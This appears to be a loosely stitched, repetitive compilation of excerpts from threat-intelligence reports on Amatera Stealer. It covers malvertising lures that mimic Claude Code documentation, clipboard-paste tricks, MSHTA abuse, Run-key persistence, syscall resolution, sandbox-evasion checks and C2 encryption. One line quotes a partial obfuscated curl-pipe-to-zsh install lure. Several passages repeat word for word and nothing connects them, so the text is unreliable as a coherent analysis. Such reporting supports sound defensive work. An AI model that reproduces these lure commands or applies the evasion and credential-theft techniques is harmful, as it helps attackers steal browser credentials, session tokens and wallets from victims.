Amatera Stealer

Sponsored results direct victims to lure pages hosted on trusted platforms -- Squarespace, Cloudflare Pages, and Tencent EdgeOne -- that mirror the official Claude Code documentation.

This is a pure malvertising play. No email vector, no phishing links. The attack surface is the search engine results page itself.

Inside the archive is a file called Setup.exe, which is actually a legitimate Python interpreter bundled with malicious scripts that quietly launch the attack in the background.

Based on Bitdefender's analysis, MSHTA is used as an intermediary step in multi-stage PowerShell attacks before the retrieval of malicious payloads is complete, with attackers executing scripts directly in memory to evade security controls.

The lure page presents what appears to be a standard curl | sh install command... curl -ksfLS $( echo '...' | base64 -D)| zsh

Layer 2 HTA/VBScript 1,476,332 bytes, 531 lines, 6 polymorphic blocks, 100+ XOR stubs

Amatera employs RecycledGate ... a SysCall number (SSN) resolution technique that combines elements of the FreshyCalls and Hell's Gate techniques. | For each resolved SSN, there is a wrapper function that issues the SysCall.

The infection starts when a victim downloads what appears to be free or cracked software... When a user visits one of these pages, JavaScript secretly copies a malicious command to the clipboard and instructs them to press Win + R, paste it, and hit Enter.

Victims who copy the displayed install command unknowingly execute a multi-stage loader that delivers Amatera Stealer.

The infection starts when a victim downloads what appears to be free or cracked software. Inside the archive is a file called Setup.exe, which is actually a legitimate Python interpreter bundled with malicious scripts that quietly launch the attack in the background.

Windows Persistence Registry Run key: HKCU\Software\Microsoft\Windows\CurrentVersion\Run with names mimicking Microsoft services

the reflective injection process begins by mapping the payload's sections into a newly allocated PAGE_READWRITE buffer

Windows Persistence Registry Run key: HKCU\Software\Microsoft\Windows\CurrentVersion\Run with names mimicking Microsoft services

String encryption uses XTEA ... SysCall SSNs ... stored XOR-encoded ... Control-flow flattening / indirect control-flow obfuscation has been observed

If configured to do so ... overwriting 0x400 (1024) bytes at the payload's base address with null (0x00) bytes, effectively erasing the payload's PE headers from memory.

Inside the archive is a file called Setup.exe, which is actually a legitimate Python interpreter bundled with malicious scripts... it uses a renamed MSHTA copy disguised as iso2022.exe

The vast majority of detections for mshta.exe come from instances where the command line contains domains that appear to be legitimate services but are hosted on the .cc TLD... Starting in late February 2026... shifted to .vg and .gl TLDs.

the reflective injection process begins by mapping the payload's sections into a newly allocated PAGE_READWRITE buffer

It uses a 128-byte XOR key to first decrypt the encrypted payload blob, then aPLib to decompress it.

The tool is MSHTA, short for Microsoft HTML Application Host, a built-in Windows utility that can run scripts from local files and remote internet locations... Attackers have been using it to deliver some of today’s most harmful malware... All use MSHTA as a stepping stone during early or middle stages of infection.

The table below summarizes Amatera Stealer's checks designed to evade sandboxes.

Checks for the presence of Kaspersky driver files ... Checks the active keyboard layout ... Checks if there are less than 5 installed programs ... less than 6 running processes.

Functions as a reflective loader [ T1620 ] that decrypts, decompresses, and transfers execution to a DLL or EXE payload.

Anti-debug functionality is common throughout the malware ... If so, the process exits via NtTerminateProcess SysCall.

Exfiltration Targets Browser credentials, cookies, and session tokens

Password manager file globs broadened for Bitwarden, 1Password, RoboForm, and NordPass

The decoded bash script contains the actual stealing logic: browser credential harvesting... Exfiltration Targets Browser credentials, cookies, and session tokens

The final payload is most often LummaStealer, designed to harvest browser credentials, session cookies, and cryptocurrency wallet data. Amatera, another stealer in the same chain, targets similar data.

Checks if there are less than 6 running processes ... enumerate running processes and compares each process name

File grabber updated to search the victim's Downloads directory; pattern lists nearly doubled

The table below summarizes Amatera Stealer's checks designed to evade sandboxes.

Checks for the presence of Kaspersky driver files ... Checks the active keyboard layout ... Checks if there are less than 5 installed programs ... less than 6 running processes.

Checks if there are less than 5 installed programs by enumerating the registry key: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall

Checks the active keyboard layout via GetKeyboardLayout, if Ukrainian, the malware exits.

Anti-debug functionality is common throughout the malware ... If so, the process exits via NtTerminateProcess SysCall.

Decrypting further communication with the C2 reveals ... zip archives with exfiltrated data.

the client initiates a session by sending an HTTP POST to the C2's root path (/)

As the Python script runs, it uses a renamed MSHTA copy disguised as iso2022.exe to connect to attacker servers and fetch the next-stage payload... That single action triggers MSHTA to fetch a remote script that runs entirely in memory.

C2 communications now use an ECDH (NIST P-256) key exchange with ChaCha20-Poly1305

All subsequent communications to and from the C2 use the Authenticated Encryption with Associated Data (AEAD) algorithm ChaCha20-Poly1305